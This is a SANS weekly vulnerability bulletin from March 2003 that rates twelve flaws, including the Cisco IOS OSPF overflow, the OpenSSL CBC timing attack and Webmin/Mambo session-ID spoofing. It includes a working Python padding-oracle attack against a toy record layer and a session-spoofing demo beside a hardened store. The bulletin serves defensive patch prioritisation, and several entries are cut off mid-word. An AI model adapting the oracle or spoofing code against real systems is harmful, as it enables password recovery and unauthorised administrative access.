From: The SANS Institute (CriticalVulnerabilityAnalysis at sans.org)
Date: Mon Mar 03 2003 - 08:19:22 CST
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Later today, we will send out an alert with two additional critical
vulnerabilities that will require immediate action.
***********************************************************************
SANS Critical Vulnerability Analysis
March 3, 2003 Vol. 2. No. 8
***********************************************************************
The weekly CVA prioritizes and summarizes the most important
vulnerabilities and attacks identified during the past week and
provides guidance on appropriate actions to protect your systems.
***********************************************************************
Table of Contents:
Widely Deployed Software:
(1) CRITICAL: Cisco IOS OSPF Neighbor Buffer Overflow
(2) HIGH: Windows ME/XP IE Help Center Code Execution
(3) HIGH: Multi-Vendor Session Initiation Protocol (SIP)
Vulnerabilities
(4) LOW: OpenSSL CBC MIM Error Message Timing Attack
(5) LOW: Multi-Vendor Terminal Escape Sequence Vulnerabilities
Other Software:
(6) HIGH: ISMAIL Domain Name Buffer Overflow
(7) HIGH: Mambo Site Server Session ID Spoofing
(8) HIGH: Webmin/Usermin Web Server Session ID Spoofing
(9) HIGH: Apple Quicktime/Darwin Administration Server Buffer Overflow
(10) HIGH: CPanel guestbook.cgi Remote Command Execution Vulnerability
(11) MODERATE: moxftp Client Server Banner Buffer Overflow
(12) MODERATE: sircd IRC Server DNS Lookup Hostname Buffer Overflow
********************************************************************
Widely Deployed Software
********************************************************************
(1) CRITICAL: Cisco IOS OSPF Neighbor Buffer Overflow
================================================================
Affected Products:
Cisco IOS Versions 11.1 - 12.0
Description:
Older versions of IOS contain a vulnerability in handling more than
255 distinct OSPF neighbor announcements per interface. Exploit
code has been posted that leverages the vulnerability to execute
attacker-supplied code on a vulnerable router resulting in complete
system compromise. The exploit code was developed by FX of Phenoelit,
who recently published a paper on writing buffer overflows for IOS.
Risk: Cisco router compromise.
Deployment: Significant. The fix for this vulnerability has been
available for some time, but due to many administrators' reluctance
to update router software, the deployed base could still be sizable.
Ease of Exploitation: Simple. Exploit code has been posted.
Status: Vendor confirmed, all IOS versions including and following
the versions listed below contain the fix:
12.0(19)S, 12.0(19)ST, 12.1(1), 12.1(1)DB, 12.1(1)DC, 12.1(1)T.
Severity: CRITICAL (server root compromise, infrastructure,
exploit code available, significant deployment)
References:
------------
Bugtraq posting by FX of Phenoelit (includes exploit):
http://www.securityfocus.com/archive/1/312510/2003-02-19/2003-02-25/0
Cisco Statement:
http://archives.neohapsis.com/archives/bugtraq/2003-02/0267.html
SecurityFocus Vulnerability Information (includes exploit)
http://www.securityfocus.com/bid/6895
FX's Paper on Writing Buffer Overflows for IOS (Phrack #60 2002-12-28)
http://www.phrack-dont-give-a-shit-about-dmca.org/show.php?p=60&a=7
Council Site Actions:
Nearly all sites saw this as important for immediate action. Most
sites have already installed the patch and/or block OSPF at the border.
***********************************************************************
(2) HIGH: Windows ME/XP IE Help Center Code Execution
=================================================================
Affected Products:
Windows ME (any version)
Windows XP without SP1
Description:
It is possible for attackers to construct a malicious URL that will,
when opened by Internet Explorer, execute arbitrary code on the system
of the user running the browser. The problem is with the Windows
Help and Support Center, which is responsible for handling hcp://
URLs. Users can be compromised by clicking on a malicious link in
a webpage or email or, under some circumstances, by simply opening
a hostile email. Attacker-supplied code will be executed with the
privileges of the currently logged-in user.
Risk: Windows ME/XP web/email client compromise.
Deployment: Widely deployed. The vulnerability affects all
Windows ME users and some Windows XP users.
Ease of Exploitation: Simple. The Hackademy posting shows how to
exploit the flaw to execute arbitrary script in the Local Computer
Zone of a vulnerable system.
Status: Vendor confirmed, patch available.
Severity: HIGH (client compromise, exploit details, widely deployed)
References:
-----------
VulnWatch posting by Fozzy of Hackademy:
http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0098.html
Microsoft Security Bulletin MS03-006:
http://www.microsoft.com/technet/security/bulletin/MS03-006.asp
Council Site Actions:
Council site responses varied widely. Some do not tell their end users
about vulnerabilities until they are being actively exploited. Others
notified their help desks. Others scheduled patches for the next
update cycle and others have already patched it.
***********************************************************************
(3) HIGH: Multi-Vendor Session Initiation Protocol (SIP) Vulnerabilities
========================================================================
Affected Products:
Cisco PIX Firewall with SIP support running some 5.x and 6.x versions
Cisco Routers running IOS 12.2T and 12.2X trains
Cisco IP Phone Models 7940/7960 running SIP images prior to 4.2
IPTel SIP Express Router
Nortel Succession Communication Server 2000 where SIP-T is provisioned
Other vendor products (see CERT advisory)
Description:
Multiple vulnerabilities have been found in various vendor
implementations of the SIP protocol, a new protocol gaining usage in
VoIP applications. The vulnerabilities were revealed by the latest
PROTOS test suite that stresses an implementation's ability to handle
malformed SIP INVITE messages. The vulnerabilities range from buffer
overflows allowing remote code execution to denial of service attacks
which include rebooting Cisco routers and PIX firewalls remotely.
Risk: Remote compromise and/or denial of service.
Deployment: Widely deployed. This vulnerability affects products
from multiple vendors, including widely deployed Cisco routers and
firewalls.
Ease of Exploitation: Denial of service attacks: Simple. The
vulnerabilities can be exploited by the testcases provided in the
PROTOS SIP test suite.
Status: Varies according to vendor. The CERT advisory contains
vendor-specific information. Cisco has released a separate advisory
with patch information.
Severity: HIGH (DoS and potentially code execution, infrastructure,
widely deployed, DoS exploit code available)
References:
------------
CERT Advisory:
http://www.cert.org/advisories/CA-2003-06.html
Cisco Advisory:
http://www.cisco.com/warp/public/707/cisco-sa-20030221-protos.shtml
OUSPG PROTOS SIP Project Page:
http://www.ee.oulu.fi/research/ouspg/protos/testing/c07/sip/
Council Site Actions:
No sites reported that they are affected by this vulnerability,
but several said they use IP telephony and that this vulnerability
raises the issue of IP telephony security.
***********************************************************************
(4) LOW: OpenSSL CBC MIM Error Message Timing Attack
=============================================================
Affected Products:
OpenSSL versions prior to 0.9.6i and 0.9.7a
when used with block ciphers in CBC mode
Description:
In certain configurations OpenSSL is vulnerable to a timing-based
man-in-the-middle attack that allows a remote attacker to recover
sensitive information (such as a password) that is sent repeatedly
across SSL connections. Attackers must be able to intercept and
modify data sent between client and server for hundreds or thousands
of sessions containing the target information. A practical attack
has been demonstrated for recovering the password of a secure IMAP
user in a common client configuration where the user password is
sent to the server multiple times every few minutes.
Risk: Compromise of sensitive information, such as a password, that
is sent repeatedly over an SSL connection.
Deployment: Moderate. The affected OpenSSL versions are widely
deployed, but are not often used with block ciphers in CBC mode.
Ease of Exploitation: Challenging. The attacker must write code
and must be positioned on the network such that normal variations
in network latency do not ruin the timing measurements. Further,
the attacker must be able to intercept and modify client-server
communications, and must have access to hundreds of sessions containing
the information to be recovered.
Status: OpenSSL versions 0.9.6i and 0.9.7a contain the fix.
Severity: LOW (client account compromise, difficult exploit,
vulnerability details available)
References:
--------------
OpenSSL Advisory:
http://www.openssl.org/news/secadv_20030219.txt
Description of using the attack to obtain a password:
http://lasecwww.epfl.ch/memo_ssl.shtml
News Article:
http://news.bbc.co.uk/2/hi/technology/2785145.stm
SecurityFocus Vulnerability Information:
http://www.securityfocus.com/bid/6884
Council Site Actions:
No council sites reported using the affected software.
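The timing attack is Vaudenay's CBC padding-oracle attack carried over to
the SSL/TLS record layer: a receiver that rejects a record for bad padding
before it computes the MAC finishes measurably sooner than one that computes
the MAC and then rejects it, and that difference answers "was the padding
valid?" for an attacker-chosen ciphertext. The following is an added example
written for this page; it is not OpenSSL code and not the code from the
referenced paper. A constructed 64-bit Feistel cipher, a TLS 1.0 style pad
and a truncated HMAC stand in for the real primitives, and the toy server
hands back its error type directly instead of leaking it through timing,
which is the one thing the attacker needs. The attacker puts a chosen block R
in the IV position in front of one captured block C_i and reads which error
path fired; the recovered plaintext is D(C_i) xor C_(i-1).

```python
import hashlib, hmac, secrets

BLOCK, MAC_LEN = 8, 8       # toy 64-bit block; the attack does not depend on the cipher

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, half, rnd):      # round function of a stand-in Feistel block cipher
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:4]

def encrypt_block(key, b):
    l, r = b[:4], b[4:]
    for rnd in range(8):
        l, r = r, _xor(l, _f(key, r, rnd))
    return l + r

def decrypt_block(key, b):
    l, r = b[:4], b[4:]
    for rnd in reversed(range(8)):
        l, r = _xor(r, _f(key, l, rnd)), l
    return l + r

def cbc_encrypt(key, iv, pt):
    out, prev = b"", iv
    for i in range(0, len(pt), BLOCK):
        prev = encrypt_block(key, _xor(pt[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key, iv, ct):
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += _xor(decrypt_block(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return out

def tls_pad(data):           # TLS 1.0 padding: p + 1 trailing bytes, each equal to p
    p = (BLOCK - (len(data) + 1) % BLOCK) % BLOCK
    return data + bytes([p]) * (p + 1)

class RecordLayer:           # MAC-then-pad-then-encrypt, as the SSL/TLS record layer does it
    def __init__(self):
        self.enc_key, self.mac_key = secrets.token_bytes(16), secrets.token_bytes(16)

    def _mac(self, msg):
        return hmac.new(self.mac_key, msg, "sha256").digest()[:MAC_LEN]

    def send(self, iv, msg):
        return cbc_encrypt(self.enc_key, iv, tls_pad(msg + self._mac(msg)))

    def receive(self, iv, ct):
        # The two failure paths are the oracle. Unpatched OpenSSL left the padding
        # check without computing a MAC, so the paths took measurably different time.
        pt = cbc_decrypt(self.enc_key, iv, ct)
        p = pt[-1]
        if p + 1 > len(pt) or any(b != p for b in pt[-(p + 1):]):
            return "decryption_failed"            # fast path, no MAC computed
        body = pt[:-(p + 1)]
        if not hmac.compare_digest(body[-MAC_LEN:], self._mac(body[:-MAC_LEN])):
            return "bad_record_mac"               # MAC computed, then rejected
        return "ok"

def recover_block_input(oracle, c_block):
    """Find X = D(c_block) from padding-valid/invalid answers alone (Vaudenay 2002)."""
    x = bytearray(BLOCK)
    for r in range(256):                   # last byte: pad length 0 means X[7] ^ R[7] == 0
        rand = bytearray(secrets.token_bytes(BLOCK))
        rand[-1] = r
        if oracle(bytes(rand), c_block) == "decryption_failed":
            continue
        rand[-2] ^= 0xFF                   # a longer pad that happened to fit now breaks
        if oracle(bytes(rand), c_block) != "decryption_failed":
            x[-1] = r
            break
    for k in range(BLOCK - 2, -1, -1):     # then force pad length p = 7 - k, byte by byte
        p = BLOCK - 1 - k
        rand = bytearray(BLOCK)
        for j in range(k + 1, BLOCK):
            rand[j] = x[j] ^ p
        for r in range(256):
            rand[k] = r
            if oracle(bytes(rand), c_block) != "decryption_failed":
                x[k] = r ^ p
                break
    return bytes(x)

def recover_record(oracle, iv, ct):      # attacker side: no key, one block at a time
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        block = ct[i:i + BLOCK]
        out += _xor(recover_block_input(oracle, block), prev)   # P_i = D(C_i) ^ C_(i-1)
        prev = block
    return out

def demo():
    server = RecordLayer()
    iv = secrets.token_bytes(BLOCK)                         # IVs were public in SSL 3.0/TLS 1.0
    captured = server.send(iv, b"a1 LOGIN bob hunter2")    # constructed IMAP-style login
    return recover_record(server.receive, iv, captured)    # each query: chosen R as IV, then C_i
```

In the real attack every query is a fatal alert that ends the session,
which is why the advisory counts the cost in sessions rather than packets:
the password is recoverable only because the IMAP client keeps re-sending
it at the same record position, and each of the up-to-256 guesses per byte
position needs a fresh session. The toy oracle above never tears down, so
demo() recovers the whole record in one run. The fix in 0.9.6i/0.9.7a
computes the MAC even when the padding is wrong, so both error paths take
about the same time and the oracle closes.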
***********************************************************************
(5) LOW: Multi-Vendor Terminal Escape Sequence Vulnerabilities
================================================================
Affected Products:
gnome-terminal, eterm, xterm, dtterm, uxterm, rxvt, aterm, hanterm
and putty terminal emulators
Description:
Terminal emulator programs from multiple vendors are vulnerable to
the injection of hostile escape sequences into an active terminal
session. An attacker could accomplish the task, for example,
by compromising a server and attacking the client directly or by
placing malicious content in a logfile that the victim will view via
a terminal session. The flaws allow attackers to write arbitrary files
and execute arbitrary commands on vulnerable terminal client systems.
Risk: Terminal client compromise.
Deployment: Significant. These vulnerabilities affect products from
multiple vendors.
Ease of Exploitation: Straightforward. The escape sequences an attacker
can use are provided in the Bugtraq posting. The attacker's biggest
challenge lies in figuring out how to get the sequences injected into
an active terminal session involving a potential victim.
Status: Varies according to vendor. Several vendors have not yet
responded.
Severity: LOW (client compromise, vulnerability details available,
may require social engineering, significant deployment)
References:
------------
Bugtraq Posting by H D Moore:
http://archives.neohapsis.com/archives/bugtraq/2003-02/0313.html
Red Hat Advisory:
http://archives.neohapsis.com/archives/bugtraq/2003-02/0319.html
Further Commentary and eTerm Vendor Response:
http://archives.neohapsis.com/archives/bugtraq/2003-02/0323.html
http://archives.neohapsis.com/archives/bugtraq/2003-02/0324.html
http://archives.neohapsis.com/archives/bugtraq/2003-02/0348.html
http://archives.neohapsis.com/archives/bugtraq/2003-02/0326.html
Council Site Actions:
The sites that are affected by this problem said that patches would
be applied in the next regularly scheduled update.
***********************************************************************
********************************************************************
Other Software
********************************************************************
(6) HIGH: ISMAIL Domain Name Buffer Overflow
==================================================================
Affected Products:
ISMail v. 1.25 and 1.4.3 running on Windows NT/2000/XP
Description:
ISMail is a mail server for Windows designed for home and office
use. ISMail contains a buffer overflow in the SMTP service. A remote
attacker can supply an over-long domain name as part of MAIL FROM:
or RCPT TO: value, and cause a buffer overflow. The vulnerability
can be exploited to cause a denial of service or to execute arbitrary
code with "Local System" privileges.
Risk: ISMail mail server DoS or compromise.
Deployment: Moderate. ISMail is a multi-featured commercial mail
server application available for $99 from InstantServers.com.
Ease of Exploitation: Unknown, but assumed to be straightforward.
This is a stack-based overflow.
Status: Vendor confirmed, fixed software available.
Severity: HIGH (server SYSTEM-level compromise, vulnerability details
available)
References:
------------
NGSSoftware Security Advisory
http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0097.html
Vendor Website and Download.com Free Trial Download:
http://instantservers.com/ismail.html
http://download.com.com/3000-2165-10163100.html?tag=lst-0-8
Council Site Actions:
No council sites reported using the affected software. One r
***********************************************************************
(7) HIGH: Mambo Site Server Session ID Spoofing
===========================================================
Affected Products:
Mambo Open Source Site Server versions prior to 4.0.12 RC3
Description:
Mambo Site Server is a popular open source web content management
system. All versions prior to the latest release contain a session
ID spoofing vulnerability that allows remote attackers to gain
administrative control of the server without a username/password.
An exploit has been posted that causes the server to generate a valid
session ID and then uses the ID to authenticate as administrator via
the HTTP interface.
Risk: Mambo Site Server server compromise.
Deployment: Moderate. Mambo is a popular, well-maintained open source
program that integrates with Apache and runs on Linux, MacOS/X and
Windows NT/2000.
Ease of Exploitation: Simple. Exploit code has been posted.
Status: Vendor confirmed, version 4.0.12 RC3 contains the fix.
Severity: HIGH (server compromise, exploit code available)
References:
------------
Bugtraq posting by Simen Bergo (includes exploit):
http://archives.neohapsis.com/archives/bugtraq/2003-02/0302.html
SecurityFocus Vulnerability Information (includes exploit)
http://www.securityfocus.com/bid/6926
Vendor Website:
http://www.mamboserver.com/
Council Site Actions:
No council sites reported using the affected software. One r
***********************************************************************
(8) HIGH: Webmin/Usermin Web Server Session ID Spoofing Vulnerability
===============================================================
Affected Products:
The web server (minserv.pl) used by Webmin prior to version 1.070
and Usermin prior to version 1.000
Description:
Webmin and Usermin are web-based system administration interface
applications for Unix. The Webmin/Usermin HTTP server contains a
session ID spoofing vulnerability that allows remote attackers to gain
administrative control of the server without a username/password.
An exploit has been posted that injects a fake session ID into
a server's ID tracking table and then uses the fake ID to gain
administrator-level access via the HTTP interface.
Risk: Webmin/Usermin web server compromise.
Deployment: Moderate. Webmin/Usermin is a Caldera project that
is available under the BSD license. The software ships with some
operating systems including EnGarde, Gentoo and Mandrake Linux.
Ease of Exploitation: Simple. Exploit code has been posted. The posted
code works on webmin servers where the non-default "passdelay" option
has been enabled.
Status: Vendor confirmed and fixed in Webmin version 1.070 and Usermin
version 1.000.
Severity: HIGH (server compromise, exploit code available)
References:
-------------
EnGarde Security Advisory:
http://archives.neohapsis.com/archives/linux/engarde/2003-q1/0008.html
Bugtraq Posting by Carl Livitt (includes exploit):
http://archives.neohapsis.com/archives/bugtraq/2003-02/0284.html
Vendor Website and Fix Announcement:
http://www.webmin.com/
http://marc.theaimsgroup.com/?l=webmin-announce&m=104587858408101&w=2
SecurityFocus Vulnerability Information (includes exploit):
http://www.securityfocus.com/bid/6915
Council Site Actions:
Most council sites reported that they do not use the affected software.
The one that did believes that standard installation (which the
users did not modify) does not enable the passdelay option. They are
verifying that belief and will take immediate action for priority
patching if they discover their expectation is wrong.
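Items (7) and (8) are the same flaw class: a request path lets the client
get a session ID of its own choosing into the server's tracking table, and
once it is there the server trusts it like one it issued itself. The added
example below is illustrative Python written for this page; it is not
Webmin, Usermin or Mambo code and does not reproduce either posted exploit.
It puts a session store with that flaw next to one where only server-minted,
CSPRNG-generated IDs ever enter the table, and only after the password
check. The user name, password and forged ID are constructed.

```python
import secrets

USERS = {"admin": "correct horse battery staple"}     # constructed credentials


class VulnerableSessions:
    """Models the flaw class: a request-handling path that writes a client-supplied
    session ID into the tracking table, after which the ID is honoured like any other."""

    def __init__(self):
        self.table = {}                               # sid -> authenticated user

    def handle(self, sid, user_field):
        # Bookkeeping path (think: recording a login attempt) that trusts request fields.
        if sid and sid not in self.table:
            self.table[sid] = user_field
        return self.table.get(sid)                    # later requests present the same sid


class HardenedSessions:
    """Only the server mints IDs, only after the password checks, and a lookup never writes."""

    def __init__(self):
        self.table = {}

    def login(self, user, password):
        if not secrets.compare_digest(USERS.get(user, ""), password):
            return None
        sid = secrets.token_urlsafe(32)               # 256 bits from the OS CSPRNG; not guessable
        self.table[sid] = user
        return sid

    def handle(self, sid, user_field):
        # user_field is ignored on purpose: identity comes from the table, never from the client
        return self.table.get(sid)


def spoof_attempt(store):
    """What the posted exploits do: pick an ID, get the server to register it, then use it."""
    forged = "sid=" + "0" * 16                        # attacker-chosen; never issued by the server
    store.handle(forged, "admin")                     # the injecting request
    return store.handle(forged, "")                   # the follow-up request carrying only the ID
```

The check a practitioner wants is the last line of spoof_attempt: against
the vulnerable store it returns "admin", against the hardened one it returns
None, because nothing a client sends can create a table entry there.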
***********************************************************************
(9) HIGH: Apple Quicktime/Darwin Administration Server Buffer Overflow
============================================================================
Affected Products:
Apple QuickTime Administration Server version 4.1.1
Apple Darwin Administration Server version 4.1.2
Description:
The Apple Quicktime and Darwin Administration Servers are web-based
remote management applications for the QuickTime and Darwin Streaming
Media Servers. By default, these HTTP-based administration servers
run as root on port 1220/tcp. The servers contain a perl open()
vulnerability that allows remote attackers to execute arbitrary
commands with the privileges of the server process. A malicious GET
request can exploit the flaw. Several other vulnerabilities also
exist and are described in the advisory.
Risk: QuickTime/Darwin Administration Server server compromise.
Deployment: Small-Moderate. QuickTime Streaming Server is designed
for MacOS/X, and is also available as an open source server called
Darwin Streaming Server for Linux, Solaris and Windows NT/2000. Both
servers are free from Apple.
Ease of Exploitation: Straightforward. The advisory contains enough
information that an attacker can discover the rest of the technical
details and craft an attack.
Status: These vulnerabilities have been confirmed by the vendor,
who has released update instructions available at:
http://www.info.apple.com/kbnum/n70171
http://www.info.apple.com/kbnum/n70172
Severity: HIGH (server root compromise, vulnerability details)
References:
------------
@stake Advisory:
http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0094.html
SecurityFocus Vulnerability Information:
http://www.securityfocus.com/bid/6954
Vendor Website:
http://www.apple.com/quicktime/products/qtss/
Council Site Actions:
No council sites reported using the affected software. One r
***********************************************************************
(10) HIGH: CPanel guestbook.cgi Remote Command Execution
==============================================================
Affected Products:
CPanel CGI Suite version 5.0 and possibly earlier versions
Description:
The CPanel CGI suite allows web hosting customers to manage their
account information via a web interface. The included guestbook.cgi
program contains a perl open() vulnerability that allows remote
attackers to execute arbitrary code with the privileges of
the web server process. A malicious GET request can exploit the
bug. Easy-to-use exploits have been posted that allow attackers to
specify an arbitrary command line to be executed on a vulnerable
remote system.
Risk: Compromise of web servers that allow remote access to CPanel's
guestbook.cgi program.
Deployment: Moderate. CPanel is a popular commercial web hosting
control panel package for Unix that allows clients to manage their
accounts through a web interface. A one-time license is priced
at $1400.
Ease of Exploitation: Simple. Multiple exploits have been posted.
Status: These vulnerabilities have not been confirmed.
Severity: HIGH (server compromise, exploit code available)
References:
-------------
VulnWatch Posting by pokleyzz:
http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0087.html
Exploit Codes by cyzek, CaMaLeoN, and bob at dtors.net:
http://archives.neohapsis.com/archives/bugtraq/2003-02/0279.html
http://downloads.securityfocus.com/vulnerabilities/exploits/cpanel-VH.pl
http://www.packetstormsecurity.nl/filedesc/DSR-cpanel.c.html
SecurityFocus Vulnerability Information:
http://www.securityfocus.com/bid/6882
Vendor Website:
http://www.cpanel.net/realindex.html?from=
Council Site Actions:
No council sites reported using the affected software. One r
***********************************************************************
(11) MODERATE: moxftp Client Server Banner Buffer Overflow
==============================================================
Affected Products:
moxftp FTP client version 2.2
Description:
The moxftp FTP client contains a buffer overflow in the handling
of over-large server banners. A malicious FTP server can exploit
the vulnerability to execute arbitrary code on the client system
with the privileges of the user running moxftp. An exploit has been
posted that provides a malicious server with shell access to a victim
client machine.
Risk: moxftp FTP client compromise.
Deployment: Small. moxftp is an FTP user interface for the X Window System
available for several versions of Unix.
Ease of Exploitation: Simple. Exploit code has been posted.
Status: This vulnerability has not been confirmed.
Severity: MODERATE (client compromise, exploit code available)
References:
-----------
Bugtraq Posting by Knud Erik Hojgaard (exploit included):
http://archives.neohapsis.com/archives/bugtraq/2003-02/0285.html
Background Information on moxftp:
http://media.it.kth.se/SONAH/ANALYSYS/acts/sonah/guide/ar/ftptoo.html
SecurityFocus Vulnerability Information:
http://www.securityfocus.com/bid/6921
Council Site Actions:
No council sites reported using the affected software. One r
***********************************************************************
(12) MODERATE: sircd IRC Server DNS Lookup Hostname Buffer Overflow
======================================================================
Affected Products:
sircd IRC server versions 0.4.0 and 0.4.4
Description:
The sircd IRC server is vulnerable to a buffer overflow in the handling
of an over-long hostname supplied by a malicious DNS server responding
to a name lookup request. The vulnerability can be exploited to
execute arbitrary code with the privileges of the sircd process. An
exploit has been posted that takes advantage of the fact that sircd
performs automatic name lookups on connecting client IPs.
Risk: sircd IRC server compromise.
Deployment: Small. sircd is alpha-level open source software that is
supported on FreeBSD, WindowsNT/2000, Linux and Solaris.
Ease of Exploitation: Straightforward. Exploit code has been posted
that grants shell access to a remote attacker. The attacker's biggest
challenge lies in manipulating DNS information so that the server
receives the malicious code in response to a DNS name lookup request.
Status: The advisory indicates that the vendor confirmed the issue and
committed a patch to CVS on Feb. 4, 2003.
Severity: MODERATE (server compromise, exploit code available,
attacker must manipulate DNS)
References:
------------
Bugtraq Posting by Knud Erik Hojgaard (exploit included):
http://archives.neohapsis.com/archives/bugtraq/2003-02/0293.html
Vendor Website:
http://www.sircd.org
Council Site Actions:
No council sites reported using the affected software. One r
***********************************************************************
************************************************************
About the CVA Process and Council
The CVA is produced in four phases:
Phase 1: Neohapsis (www.neohapsis.com) director of research, Jeff
web sites as well as bugtraq and other sources of new vulnerability
information and compile what they believe to be a complete list of all
new vulnerabilities and major vulnerability announcements made during
the week. The SANS Institute and Network Computing Magazine vet the
list through the major system manufacturers and jointly publish it
every week as the Security Alert Consensus (SAC). Anyone may subscribe
to the SAC at http://www.sans.org/newlook/digests/SAC.htm
Phase 2: TippingPoint's Vicki Irwin culls the SAC list to extract the
vulnerabilities and announcements that demand immediate action. This
reduces the list from 30-50 each week down under 10. Vicki has been
on the front lines of intrusion detection and vulnerability testing
for nearly six years and her work in the field is legendary.
Phase 3: Very technical security managers at fifteen of the largest
user organizations in the United States each review the "immediate
action" vulnerabilities and describe what they did or did not do
to protect their organizations. Council members include banks and
other financial organizations, government agencies, universities,
major research laboratories, ISPs, health care, manufacturers,
insurance companies and a couple more. The individual members have
direct responsibility for security for their systems and networks. All
were concerned that information about their security configuration
would leak out, and agreed to serve only if their identities were
not revealed.
Phase 4: SANS compiles the responses and identifies the items on which
the Council members took or are taking action, produces the weekly CVA,
and distributes it via email to all eligible persons.
**********************************************************************
Critical Vulnerability Analysis Scale Ratings
In ranking vulnerabilities several factors are taken into account,
such as:
- Is this a server or client compromise? At what privilege level?
- Is the affected product widely deployed?
- Is the problem found in default configurations/installations?
- Are the affected assets high value (e.g. databases, e-commerce
servers)?
- Is the network infrastructure affected (DNS, routers, firewalls)?
- Is exploit code publicly available?
- Are technical vulnerability details available?
- How difficult is it to exploit the vulnerability?
- Does the attacker need to lure victims to a hostile server?
Based on the answers to these questions, vulnerabilities are ranked
as Critical, High, Moderate, or Low.
CRITICAL vulnerabilities are those where essentially all planets
align in favor of the attacker. These vulnerabilities typically
affect default installations of very widely deployed software, result
in root compromise of servers or infrastructure devices, and the
information required for exploitation (such as example exploit code)
is widely available to attackers. Further, exploitation is usually
straightforward, in the sense that the attacker does not need any
special knowledge about individual victims, and does not need to lure
a target user into performing any special functions.
HIGH vulnerabilities are usually issues that have the potential to
become CRITICAL, but have one or a few mitigating factors that make
exploitation less attractive to attackers. For example, vulnerabilities
that have many CRITICAL characteristics but are difficult to exploit,
do not result in elevated privileges, or have a minimally sized victim
pool are usually rated HIGH. Note that HIGH vulnerabilities where the
mitigating factor arises from a lack of technical exploit details will
become CRITICAL if these details are later made available. Thus, the
paranoid administrator will want to treat such HIGH vulnerabilities as
CRITICAL, if it is assumed that attackers always possess the necessary
exploit information.
MODERATE vulnerabilities are those where the scales are slightly tipped
in favor of the potential victim. Denial of service vulnerabilities
are typically rated MODERATE, since they do not result in compromise
of a target. Exploits that require an attacker to reside on the same
local network as a victim, only affect nonstandard configurations
or obscure applications, require the attacker to social engineer
individual victims, or where exploitation only provides very limited
access are likely to be rated MODERATE.
LOW vulnerabilities usually do not affect most administrators, and
exploitation is largely unattractive to attackers. Often these issues
require the attacker to already have some level of access to a target
(e.g. be able to execute arbitrary SQL queries, or be able to pop mail
from a mail server), require elaborate specialized attack scenarios,
and only result in limited damage to a target. Alternatively, a LOW
ranking may be applied when there is not enough information to fully
assess the implications of a vulnerability. For example, vendors often
imply that exploitation of a buffer overflow will only result in a
denial of service. However, many times such flaws are later shown
to allow for execution of attacker-supplied code. In these cases,
the issues are reported in order to alert security professionals to
the potential for deeper problems, but are ranked as LOW due to the
element of speculation.
Remediation Timescale
===================================
A vulnerability rating corresponds to the "threat level" of a
particular issue. Critical threats must be responded to most quickly,
as the potential for exploitation is high. Recommended response times
corresponding to each of the ratings are below. These recommendations
should be tailored according to the level of deployment of the affected
product at your organization.
CRITICAL: 48 hours
HIGH: 5 business days
MODERATE: 15 business days
LOW: At the administrator's discretion
******************************************************************
Subscriptions: The CVA is distributed free of charge to people
responsible for securing information systems and networks. You may
forward this newsletter to any people with such responsibility inside
or outside your organization.
To subscribe, at no cost, go to https://www.sans.org/sansnews/
where you may also request subscriptions to any of SANS other free
newsletters.
To change your subscription, address, or other information, visit
http://www.sans.org/sansurl and enter your SD number or email address
(from the headers.) You will receive your personal URL via email.
Copyright 2003. All rights reserved. No copying, forwarding, or reuse
allowed, other than those listed in the preceding paragraph, without
written permission from the SANS Institute. Email sansro at sans.org
for permission.
==end==
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
iD8DBQE+Y1lc+LUG5KFpTkYRAsPQAJsH0FeTc6/yRyLt2b/pg9fu2Pym+ACdE8/q
7gtJpk1LfX8gMjrbOvQRwcw=
=4njE
-----END PGP SIGNATURE-----